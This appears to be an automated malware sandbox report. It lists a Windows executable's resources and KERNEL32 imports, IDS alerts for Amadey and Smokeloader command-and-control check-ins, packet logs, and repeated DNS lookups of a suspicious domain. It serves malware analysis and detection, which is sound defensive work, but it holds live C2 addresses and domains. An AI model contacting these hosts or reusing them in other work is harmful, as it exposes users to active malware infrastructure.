                                              RT_CURSOR0x579600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                                              RT_ICON0x409300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x40ff80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x415600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x426080x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x42ab00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x433580x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x43a200x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x43f880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x450300x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x459b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x45e800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x467280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x48cd00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x49da80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4ac500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4b4f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4bbc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsRaeto-RomanceSwitzerland
                                              RT_ICON0x4c1280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600Raeto-RomanceSwitzerland
                                              RT_ICON0x4e6d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224Raeto-RomanceSwitzerland
                                              RT_ICON0x4f7780x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400Raeto-RomanceSwitzerland
                                              RT_ICON0x501000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088Raeto-RomanceSwitzerland
                                              RT_ICON0x505e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x514880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x51b500x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x520b80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x546600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x557080x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_ICON0x560900x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Raeto-RomanceSwitzerland
                                              RT_STRING0x583700x1dadataRaeto-RomanceSwitzerland
                                              RT_STRING0x585500x150dataRaeto-RomanceSwitzerland
                                              RT_STRING0x586a00x27cdataRaeto-RomanceSwitzerland
                                              RT_ACCELERATOR0x565d80x90dataRaeto-RomanceSwitzerland
                                              RT_ACCELERATOR0x565600x78dataRaeto-RomanceSwitzerland
                                              RT_GROUP_CURSOR0x579300x30data
                                              RT_GROUP_CURSOR0x582080x14data
                                              RT_GROUP_ICON0x49d780x30dataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x45e200x5adataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x505680x76dataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x42a700x3edataRaeto-RomanceSwitzerland
                                              RT_GROUP_ICON0x564f80x68dataRaeto-RomanceSwitzerland
                                              RT_VERSION0x582200x14cIntel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                              DLLImport
                                              KERNEL32.dllLoadLibraryW, CallNamedPipeW, EnumSystemCodePagesW, EnumDateFormatsA, OpenMutexA, GetConsoleAliasesLengthA, CompareStringA, AreFileApisANSI, CreateFileW, EnumCalendarInfoExA, RequestWakeupLatency, GetConsoleAliasA, CreateFileA, SetComputerNameA, GetSystemWindowsDirectoryA, GetModuleHandleA, GlobalUnlock, FindFirstVolumeMountPointW, CreateDirectoryExW, GetLogicalDriveStringsA, ReadConsoleInputA, FindNextVolumeMountPointW, SearchPathW, MoveFileW, CallNamedPipeA, GetCurrentDirectoryW, GetDriveTypeW, CreateMailslotA, CommConfigDialogW, GetProcAddress, LocalAlloc, DeleteTimerQueueTimer, SetHandleInformation, CreateJobObjectW, WriteConsoleOutputAttribute, FindFirstVolumeA, InterlockedIncrement, LocalFlags, CloseHandle, GetTickCount, ZombifyActCtx, SetConsoleCtrlHandler, AddAtomA, GetThreadPriority, FreeEnvironmentStringsW, InterlockedExchange, GetConsoleTitleW, SetVolumeMountPointA, ClearCommError, lstrlenA, CreateDirectoryExA, LoadLibraryA, GlobalFindAtomA, TerminateJobObject, lstrcpynA, BackupSeek, GetSystemDirectoryA, VerSetConditionMask, EnumSystemLocalesW, InterlockedFlushSList, WritePrivateProfileSectionW, GetStringTypeExW, GetFileAttributesW, ActivateActCtx, ReadFile, ResetEvent, LocalShrink, LocalLock, GlobalCompact, SetCommState, WriteConsoleInputW, DeleteAtom, FindResourceW, GetConsoleSelectionInfo, CreateIoCompletionPort, GetPrivateProfileStructA, ConvertThreadToFiber, InterlockedExchangeAdd, EnumCalendarInfoW, GetConsoleMode, EnumCalendarInfoA, GetConsoleAliasExesLengthA, CopyFileA, InterlockedDecrement, HeapAlloc, GetLastError, DeleteFileA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, HeapSize, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RaiseException, InitializeCriticalSectionAndSpinCount, RtlUnwind, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetConsoleCP, FlushFileBuffers, SetFilePointer, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle
                                              Language of compilation systemCountry where language is spokenMap
                                              Raeto-RomanceSwitzerland
                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              192.168.2.362.204.41.7949801802027700 12/13/22-20:09:37.904526TCP2027700ET TROJAN Amadey CnC Check-In4980180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949764802027700 12/13/22-20:09:24.415498TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949749802027700 12/13/22-20:09:18.397632TCP2027700ET TROJAN Amadey CnC Check-In4974980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949767802027700 12/13/22-20:09:25.222687TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949795802027700 12/13/22-20:09:35.735518TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949770802027700 12/13/22-20:09:26.190276TCP2027700ET TROJAN Amadey CnC Check-In4977080192.168.2.362.204.41.79
                                              192.168.2.3185.246.221.15149699802851815 12/13/22-20:08:50.072694TCP2851815ETPRO TROJAN Sharik/Smokeloader CnC Beacon 184969980192.168.2.3185.246.221.151
                                              192.168.2.362.204.41.7949740802027700 12/13/22-20:09:15.487438TCP2027700ET TROJAN Amadey CnC Check-In4974080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949798802027700 12/13/22-20:09:36.748511TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949746802027700 12/13/22-20:09:17.426965TCP2027700ET TROJAN Amadey CnC Check-In4974680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949743802027700 12/13/22-20:09:16.449856TCP2027700ET TROJAN Amadey CnC Check-In4974380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949761802027700 12/13/22-20:09:23.806620TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949752802027700 12/13/22-20:09:21.874851TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949771802027700 12/13/22-20:09:26.565033TCP2027700ET TROJAN Amadey CnC Check-In4977180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949802802027700 12/13/22-20:09:39.191576TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949748802027700 12/13/22-20:09:18.100262TCP2027700ET TROJAN Amadey CnC Check-In4974880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949777802027700 12/13/22-20:09:30.589327TCP2027700ET TROJAN Amadey CnC Check-In4977780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949742802027700 12/13/22-20:09:16.147180TCP2027700ET TROJAN Amadey CnC Check-In4974280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949794802027700 12/13/22-20:09:35.428306TCP2027700ET TROJAN Amadey CnC Check-In4979480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949789802027700 12/13/22-20:09:34.068418TCP2027700ET TROJAN Amadey CnC Check-In4978980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949754802027700 12/13/22-20:09:22.487126TCP2027700ET TROJAN Amadey CnC Check-In4975480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949782802027700 12/13/22-20:09:32.020133TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949747802027700 12/13/22-20:09:17.691856TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949760802027700 12/13/22-20:09:23.551005TCP2027700ET TROJAN Amadey CnC Check-In4976080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949776802027700 12/13/22-20:09:30.348436TCP2027700ET TROJAN Amadey CnC Check-In4977680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949753802027700 12/13/22-20:09:22.159892TCP2027700ET TROJAN Amadey CnC Check-In4975380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949759802027700 12/13/22-20:09:23.268020TCP2027700ET TROJAN Amadey CnC Check-In4975980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949783802027700 12/13/22-20:09:32.395745TCP2027700ET TROJAN Amadey CnC Check-In4978380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949807802027700 12/13/22-20:09:40.738951TCP2027700ET TROJAN Amadey CnC Check-In4980780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949788802027700 12/13/22-20:09:33.792525TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949765802027700 12/13/22-20:09:24.668106TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949787802027700 12/13/22-20:09:33.525784TCP2027700ET TROJAN Amadey CnC Check-In4978780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949790802027700 12/13/22-20:09:34.337562TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949796802027700 12/13/22-20:09:36.034730TCP2027700ET TROJAN Amadey CnC Check-In4979680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949781802027700 12/13/22-20:09:31.753391TCP2027700ET TROJAN Amadey CnC Check-In4978180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949772802027700 12/13/22-20:09:29.469495TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949735802027700 12/13/22-20:09:14.280167TCP2027700ET TROJAN Amadey CnC Check-In4973580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949741802027700 12/13/22-20:09:15.797540TCP2027700ET TROJAN Amadey CnC Check-In4974180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949799802027700 12/13/22-20:09:37.255404TCP2027700ET TROJAN Amadey CnC Check-In4979980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949766802027700 12/13/22-20:09:24.922545TCP2027700ET TROJAN Amadey CnC Check-In4976680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949803802027700 12/13/22-20:09:39.585529TCP2027700ET TROJAN Amadey CnC Check-In4980380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949806802027700 12/13/22-20:09:40.381114TCP2027700ET TROJAN Amadey CnC Check-In4980680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949757802027700 12/13/22-20:09:23.006710TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949778802027700 12/13/22-20:09:30.907345TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949775802027700 12/13/22-20:09:30.081643TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949793802027700 12/13/22-20:09:35.174611TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949800802027700 12/13/22-20:09:37.581033TCP2027700ET TROJAN Amadey CnC Check-In4980080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949784802027700 12/13/22-20:09:32.706051TCP2027700ET TROJAN Amadey CnC Check-In4978480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949769802027700 12/13/22-20:09:25.868942TCP2027700ET TROJAN Amadey CnC Check-In4976980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949774802027700 12/13/22-20:09:29.736811TCP2027700ET TROJAN Amadey CnC Check-In4977480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949805802027700 12/13/22-20:09:40.125674TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949768802027700 12/13/22-20:09:25.563234TCP2027700ET TROJAN Amadey CnC Check-In4976880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949751802027700 12/13/22-20:09:20.733567TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949786802027700 12/13/22-20:09:33.253065TCP2027700ET TROJAN Amadey CnC Check-In4978680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949791802027700 12/13/22-20:09:34.581849TCP2027700ET TROJAN Amadey CnC Check-In4979180192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949739802027700 12/13/22-20:09:15.157831TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949745802027700 12/13/22-20:09:17.106517TCP2027700ET TROJAN Amadey CnC Check-In4974580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949750802027700 12/13/22-20:09:19.302564TCP2027700ET TROJAN Amadey CnC Check-In4975080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949792802027700 12/13/22-20:09:34.882839TCP2027700ET TROJAN Amadey CnC Check-In4979280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949779802027700 12/13/22-20:09:31.163445TCP2027700ET TROJAN Amadey CnC Check-In4977980192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949785802027700 12/13/22-20:09:32.996655TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949744802027700 12/13/22-20:09:16.793275TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949780802027700 12/13/22-20:09:31.434688TCP2027700ET TROJAN Amadey CnC Check-In4978080192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949738802027700 12/13/22-20:09:14.724261TCP2027700ET TROJAN Amadey CnC Check-In4973880192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949762802027700 12/13/22-20:09:24.088211TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949804802027700 12/13/22-20:09:39.864342TCP2027700ET TROJAN Amadey CnC Check-In4980480192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949756802027700 12/13/22-20:09:22.763314TCP2027700ET TROJAN Amadey CnC Check-In4975680192.168.2.362.204.41.79
                                              192.168.2.362.204.41.7949797802027700 12/13/22-20:09:36.311423TCP2027700ET TROJAN Amadey CnC Check-In4979780192.168.2.362.204.41.79
                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 13, 2022 20:07:42.480623960 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480819941 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480911970 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.480976105 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481025934 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481070042 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481070042 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481122017 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481122017 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.481149912 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.497251034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497309923 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497323036 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497344017 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497356892 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497369051 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497384071 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497395992 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497407913 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497435093 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497454882 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497478008 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497489929 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497509003 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497519970 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497534037 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497550964 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497562885 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497575045 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497637987 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497654915 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497673035 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497709036 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497792006 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497962952 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.497994900 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498008966 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498027086 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498070955 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498157024 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498172045 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498234034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498311043 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498339891 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498711109 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498748064 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498764038 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498778105 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498791933 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498806000 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498836040 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498893023 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498908043 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498922110 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.498943090 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.499001026 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499070883 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499119997 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499161959 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499176979 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499238968 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499279022 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499293089 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499314070 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499327898 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499346972 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:42.499414921 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499428034 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499474049 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499511957 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499553919 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499651909 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499667883 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499681950 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499711037 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499795914 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499833107 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499859095 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499872923 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.499912977 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500003099 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500039101 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.500052929 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.547748089 CET44349696204.79.197.200192.168.2.3
                                              Dec 13, 2022 20:07:42.547856092 CET49696443192.168.2.3204.79.197.200
                                              Dec 13, 2022 20:07:49.880563021 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.880621910 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.880705118 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.881911993 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.881938934 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.967329025 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.967442036 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.976569891 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:49.976596117 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:49.977266073 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.008229017 CET49697443192.168.2.323.35.236.109
                                              Dec 13, 2022 20:07:50.008261919 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.027926922 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.028023958 CET4434969723.35.236.109192.168.2.3
                                              Dec 13, 2022 20:07:50.028126955 CET49697443192.168.2.323.35.236.109
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 13, 2022 20:08:50.016643047 CET192.168.2.38.8.8.80xa2e4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:50.661819935 CET192.168.2.38.8.8.80x6732Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.177598953 CET192.168.2.38.8.8.80x5841Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.364558935 CET192.168.2.38.8.8.80xdcbfStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.559534073 CET192.168.2.38.8.8.80x18e8Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:51.750485897 CET192.168.2.38.8.8.80xe2e0Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.020116091 CET192.168.2.38.8.8.80x3671Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.202105045 CET192.168.2.38.8.8.80xd855Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.385538101 CET192.168.2.38.8.8.80x7d94Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.649854898 CET192.168.2.38.8.8.80xc32bStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:52.840059996 CET192.168.2.38.8.8.80xae2aStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.015722990 CET192.168.2.38.8.8.80x149cStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.208112001 CET192.168.2.38.8.8.80xdba4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.383039951 CET192.168.2.38.8.8.80xeed4Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.555284977 CET192.168.2.38.8.8.80x39faStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.723181963 CET192.168.2.38.8.8.80xc81dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:53.919317007 CET192.168.2.38.8.8.80x1a49Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.089325905 CET192.168.2.38.8.8.80xa128Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.255630016 CET192.168.2.38.8.8.80xda09Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.435497046 CET192.168.2.38.8.8.80x4194Standard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
                                              Dec 13, 2022 20:08:54.606698036 CET192.168.2.38.8.8.80xef8dStandard query (0)r3oidsofsios.comA (IP address)IN (0x0001)false
